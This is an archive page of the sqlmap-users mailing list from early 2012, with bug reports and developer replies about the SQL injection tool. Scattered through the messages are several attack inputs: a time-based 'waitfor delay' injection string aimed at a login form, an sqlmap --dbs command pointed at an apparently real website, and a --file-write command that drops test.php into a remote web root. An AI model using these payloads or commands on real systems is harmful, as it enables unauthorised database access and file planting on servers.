SIGNATURE----- > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Ryan S. <rd...@mt...> - 2012-01-23 19:58:03
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Hi all, Long time no talk, I just came across this: http://console-cowboys.blogspot.com/2012/01/bit-banging-your-database.html Which looks quite promising, basically it uses the binary representation and some boolean calculations to determine the length of fields and other information as opposed to doing it character by character. It basically narrows everything down to about 8 requests to find the length of the data. I'm not sure if SQLMap uses a technique similar, but it may be worth looking into, as it could drastically lower the time it takes to mine out info from time-based blind injection! The sample code can be found here: http://consolecowboys.org/scripts/vm_own.py Thanks! Ryan -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iF4EAREIAAYFAk8du7UACgkQt/95fIeU+XaLCAD/VCNgKVG1BqZO97VF+aSKKrQo kzbcmxJOKTgLJkl6rWMA/jH7Ax5z5zrjvDxJuw6aaJLh6Yubj+2Ee8mzZ9WiFdGC =6ngJ -----END PGP SIGNATURE----- |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-23 11:10:35
|
At the moment, there is no way to inject into a JSON data unfortunately. The asterisk character is not yet supported in POST data. We will soon implement this. Bernardo On 23 January 2012 10:39, Borja Berastegui <bor...@gm...> wrote: > Hi ! > > I've just found an injection via a JSON parameter which i've tested manually > and im trying to succeed with sqlmap. > > But I cant find the way to tell sqlmap where to inject. > > Via the --data parameter there is no way of tell where to inject like in the > URI injections with get and the * ? > > I've tried also by the --prefix and --suffix to complete the post data to > send, but this parameters got messed up with all the JSON quotes. Sqlmap > returns the error ''You havent especified the sufix''. > > Thanks for all ;) > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. Homepage: http://about.me/inquis E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Borja B. <bor...@gm...> - 2012-01-23 10:39:45
|
Hi ! I've just found an injection via a JSON parameter which i've tested manually and im trying to succeed with sqlmap. But I cant find the way to tell sqlmap where to inject. Via the --data parameter there is no way of tell where to inject like in the URI injections with get and the * ? I've tried also by the --prefix and --suffix to complete the post data to send, but this parameters got messed up with all the JSON quotes. Sqlmap returns the error ''You havent especified the sufix''. Thanks for all ;) |
|
From: Miroslav S. <mir...@gm...> - 2012-01-23 09:30:27
|
Hi Pedrito. Thank you for your report and find it "patched" with the latest commit. Kind regards, Miroslav Stampar On Mon, Jan 23, 2012 at 8:00 AM, Pedrito Perez <0ar...@gm...> wrote: > [WARNING] unknown charset 'utf8_general_ci'. Please report by e-mail to > sql...@li.... > sqlmap.py --random-agent -o -u > http://lamusicoteca.com/paginas/galeria.php?id=7 --dbs > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Pedrito P. <0ar...@gm...> - 2012-01-23 07:00:32
|
[WARNING] unknown charset 'utf8_general_ci'. Please report by e-mail to sql...@li.... sqlmap.py --random-agent -o -u http://lamusicoteca.com/paginas/galeria.php?id=7 --dbs |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-22 18:34:46
|
Hi Chris, Against login forms I generally recommend increasing --risk to 3. In your case the -t traffic.log and -v3 might be of use to debug too. Bernardo On 22 January 2012 18:18, Chris Oakley <chr...@gm...> wrote: > In fact, don't worry about suggestions for manual syntax, te...@te...'if 1 > = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder why > sqlmap is struggling? Chris > > > On 22 January 2012 18:12, Chris Oakley <chr...@gm...> wrote: >> >> Hi >> >> I've got a web app where the username field of the login form is affected >> by the following string: te...@te...'waitfor delay'0:0:10'-- as a >> username; i.e. the delay happens, the app is vulnerable. It will always >> then return you to the login screen with an invalid email error, but we >> should still be able to exploit the app using time based methods. Sqlmap >> picks up on this, but then fails at the fingerprinting stage, i.e: >> >> [18:04:03] [INFO] testing MySQL >> [18:04:03] [WARNING] time-based comparison needs larger statistical model. >> Making a few dummy requests, please wait.. >> [18:04:16] [CRITICAL] there is considerable lagging in connection >> response(s). Please use as high value for --time-sec option as p >> ossible (e.g. 10 or more) >> [18:04:16] [WARNING] the back-end DBMS is not MySQL >> [18:04:16] [INFO] testing Oracle >> [18:04:17] [WARNING] it is very important not to stress the network >> adapter's bandwidth during usage of time-based queries >> [18:04:17] [WARNING] the back-end DBMS is not Oracle >> [18:04:17] [INFO] testing PostgreSQL >> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL >> [18:04:17] [INFO] testing Microsoft SQL Server >> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server >> [18:04:18] [INFO] testing SQLite >> [18:04:18] [WARNING] the back-end DBMS is not SQLite >> [18:04:18] [INFO] testing Microsoft Access >> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access >> [18:04:18] [INFO] testing Firebird >> [18:04:19] [WARNING] the back-end DBMS is not Firebird >> [18:04:19] [INFO] testing SAP MaxDB >> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB >> [18:04:19] [INFO] testing Sybase >> [18:04:19] [WARNING] the back-end DBMS is not Sybase >> [18:04:19] [INFO] testing IBM DB2 >> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2 >> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end >> database management system. Support for this DBMS will be im >> plemented at some point >> >> I'm not sure why this would be the case, it should be able to find that >> its MS SQL Server. >> >> Any ideas why this might be the case? I can provide more verbose >> information if required, let me know. >> >> In the mean time, any ideas for some more manual injections taking into >> account the syntax of the injection above? I'm going to have a manual play >> now but I thought you might want to know wrt sqlmap. >> >> Cheers >> >> Chris > > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. Homepage: http://about.me/inquis E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Chris O. <chr...@gm...> - 2012-01-22 18:18:57
|
In fact, don't worry about suggestions for manual syntax, te...@te...'if 1 = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder why sqlmap is struggling? Chris On 22 January 2012 18:12, Chris Oakley <chr...@gm...> wrote: > Hi > > I've got a web app where the username field of the login form is affected > by the following string: te...@te...'waitfor delay'0:0:10'-- as a > username; i.e. the delay happens, the app is vulnerable. It will always > then return you to the login screen with an invalid email error, but we > should still be able to exploit the app using time based methods. Sqlmap > picks up on this, but then fails at the fingerprinting stage, i.e: > > [18:04:03] [INFO] testing MySQL > [18:04:03] [WARNING] time-based comparison needs larger statistical model. > Making a few dummy requests, please wait.. > [18:04:16] [CRITICAL] there is considerable lagging in connection > response(s). Please use as high value for --time-sec option as p > ossible (e.g. 10 or more) > [18:04:16] [WARNING] the back-end DBMS is not MySQL > [18:04:16] [INFO] testing Oracle > [18:04:17] [WARNING] it is very important not to stress the network > adapter's bandwidth during usage of time-based queries > [18:04:17] [WARNING] the back-end DBMS is not Oracle > [18:04:17] [INFO] testing PostgreSQL > [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL > [18:04:17] [INFO] testing Microsoft SQL Server > [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server > [18:04:18] [INFO] testing SQLite > [18:04:18] [WARNING] the back-end DBMS is not SQLite > [18:04:18] [INFO] testing Microsoft Access > [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access > [18:04:18] [INFO] testing Firebird > [18:04:19] [WARNING] the back-end DBMS is not Firebird > [18:04:19] [INFO] testing SAP MaxDB > [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB > [18:04:19] [INFO] testing Sybase > [18:04:19] [WARNING] the back-end DBMS is not Sybase > [18:04:19] [INFO] testing IBM DB2 > [18:04:19] [WARNING] the back-end DBMS is not IBM DB2 > [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end > database management system. Support for this DBMS will be im > plemented at some point > > I'm not sure why this would be the case, it should be able to find that > its MS SQL Server. > > Any ideas why this might be the case? I can provide more verbose > information if required, let me know. > > In the mean time, any ideas for some more manual injections taking into > account the syntax of the injection above? I'm going to have a manual play > now but I thought you might want to know wrt sqlmap. > > Cheers > > Chris > |
|
From: Chris O. <chr...@gm...> - 2012-01-22 18:12:20
|
Hi I've got a web app where the username field of the login form is affected by the following string: te...@te...'waitfor delay'0:0:10'-- as a username; i.e. the delay happens, the app is vulnerable. It will always then return you to the login screen with an invalid email error, but we should still be able to exploit the app using time based methods. Sqlmap picks up on this, but then fails at the fingerprinting stage, i.e: [18:04:03] [INFO] testing MySQL [18:04:03] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [18:04:16] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for --time-sec option as p ossible (e.g. 10 or more) [18:04:16] [WARNING] the back-end DBMS is not MySQL [18:04:16] [INFO] testing Oracle [18:04:17] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries [18:04:17] [WARNING] the back-end DBMS is not Oracle [18:04:17] [INFO] testing PostgreSQL [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL [18:04:17] [INFO] testing Microsoft SQL Server [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server [18:04:18] [INFO] testing SQLite [18:04:18] [WARNING] the back-end DBMS is not SQLite [18:04:18] [INFO] testing Microsoft Access [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access [18:04:18] [INFO] testing Firebird [18:04:19] [WARNING] the back-end DBMS is not Firebird [18:04:19] [INFO] testing SAP MaxDB [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB [18:04:19] [INFO] testing Sybase [18:04:19] [WARNING] the back-end DBMS is not Sybase [18:04:19] [INFO] testing IBM DB2 [18:04:19] [WARNING] the back-end DBMS is not IBM DB2 [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be im plemented at some point I'm not sure why this would be the case, it should be able to find that its MS SQL Server. Any ideas why this might be the case? I can provide more verbose information if required, let me know. In the mean time, any ideas for some more manual injections taking into account the syntax of the injection above? I'm going to have a manual play now but I thought you might want to know wrt sqlmap. Cheers Chris |
|
From: Miroslav S. <mir...@gm...> - 2012-01-20 11:19:44
|
Hi Daren. You wanted to ask what's this all about? It's just what the message says. Windows console is pretty limited in the area of displaying Unicode characters (because it has it's own character page scheme), so, we had to warn the user about this issue. Kind regards, Miroslav Stampar On Fri, Jan 20, 2012 at 12:12 PM, Daren Jeronimo <dar...@gm...>wrote: > [11:53:27] [WARNING] cannot properly display Unicode characters inside > Windows OS command prompt (http://bugs.python.org/issue1602). All > unhandled occurances will result in replacement with '?' charac > ter. Please, find proper character representation inside corresponding > output files. > > > ------------------------------------------------------------------------------ > Keep Your Developer Skills Current with LearnDevNow! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Daren J. <dar...@gm...> - 2012-01-20 11:12:28
|
[11:53:27] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' charac ter. Please, find proper character representation inside corresponding output files. |
|
From: Miroslav S. <mir...@gm...> - 2012-01-20 11:00:48
|
Hi Artjom. Thank you for your report and find it fixed with the latest revision (r4689). Kind regards, Miroslav Stampar On Fri, Jan 20, 2012 at 11:52 AM, Artjom <shi...@gm...> wrote: > Hello Miroslav, > > There is one more small problem in the latest revision (4688). Sqlmap > crashes if the value of "code" in Detection section of config file is > uncommented and not set (example config attached). This config is (apart > from edited bulkfile value) was generated by sqlmap itself. > > Regards, > > Artjom > > On Thu, Jan 19, 2012 at 11:57 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi Nightman. >> >> Thank you for your report. It should be fixed with the latest commit. >> >> Kind regards, >> Miroslav Stampar >> >> >> On Mon, Jan 16, 2012 at 12:18 AM, <nig...@em...> wrote: >> >>> Hi >>> I found a new bug >>> >>> C:\map>sqlmap -d mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME >>> --file-write=C:\\temp\\test.php >>> --file-dest=/var/www/*********/httpdocs/test.php >>> >>> [23:23:36] [INFO] confirming MySQL >>> [23:23:38] [INFO] the back-end DBMS is MySQL >>> back-end DBMS: MySQL >= 5.0.0 >>> [23:23:38] [INFO] fingerprinting the back-end DBMS operating system >>> [23:23:39] [INFO] the back-end DBMS operating system is Linux >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> [23:54:54] [WARNING] Lost connection to MySQL server during query >>> do you want confirmation that the file >>> '/var/www/**********/httpdocs/test.php' has been >>> successfully written on the back-end DBMS file system? [Y/n] n >>> >>> [23:55:09] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4685), >>> retry your run with the latest >>> development version from the Subversion repository. If the exception >>> persists, please send by e-mail >>> to sql...@li... the following text and any >>> information required to reproduce >>> the bug. The developers will try to reproduce the bug, fix it >>> accordingly and get back to you. >>> sqlmap version: 1.0-dev (r4685) >>> Python version: 2.7.2 >>> Operating system: nt >>> Command line: C:\map\sqlmap.py -d >>> **************************************************** >>> --file-write=C:\\temp\\test.php >>> --file-dest=/var/www/**********/httpdocs/test.php >>> Technique: STACKED >>> Back-end DBMS: MySQL (fingerprinted) >>> Traceback (most recent call last): >>> File "C:\map\_sqlmap.py", line 83, in main >>> start() >>> File "C:\map\lib\controller\controller.py", line 227, in start >>> action() >>> File "C:\map\lib\controller\action.py", line 165, in action >>> conf.dbmsConnector.close() >>> File "C:\map\plugins\generic\connector.py", line 54, in close >>> self.connector.close() >>> File >>> "C:\Users\*******\AppData\Roaming\Python\Python27\site-packages\pymysql\connections.py", >>> lin >>> e 541, in close >>> self.wfile.write(send_data) >>> File "C:\Python27\lib\socket.py", line 324, in write >>> self.flush() >>> File "C:\Python27\lib\socket.py", line 303, in flush >>> self._sock.sendall(view[write_offset:write_offset+buffer_size]) >>> error: [Errno 10053] An established connection was aborted by the >>> software in your host machine >>> >>> [*] shutting down at 23:55:09 >>> >>> >>> ------------------------------------------------------------------------------ >>> RSA(R) Conference 2012 >>> Mar 27 - Feb 2 >>> Save $400 by Jan. 27 >>> Register now! >>> http://p.sf.net/sfu/rsa-sfdev2dev2 >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> Keep Your Developer Skills Current with LearnDevNow! >> The most comprehensive online learning library for Microsoft developers >> is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, >> Metro Style Apps, more. Free future releases when you subscribe now! >> http://p.sf.net/sfu/learndevnow-d2d >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > ------------------------------------------------------------------------------ > Keep Your Developer Skills Current with LearnDevNow! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
48 messages has been excluded from this view by a project administrator.
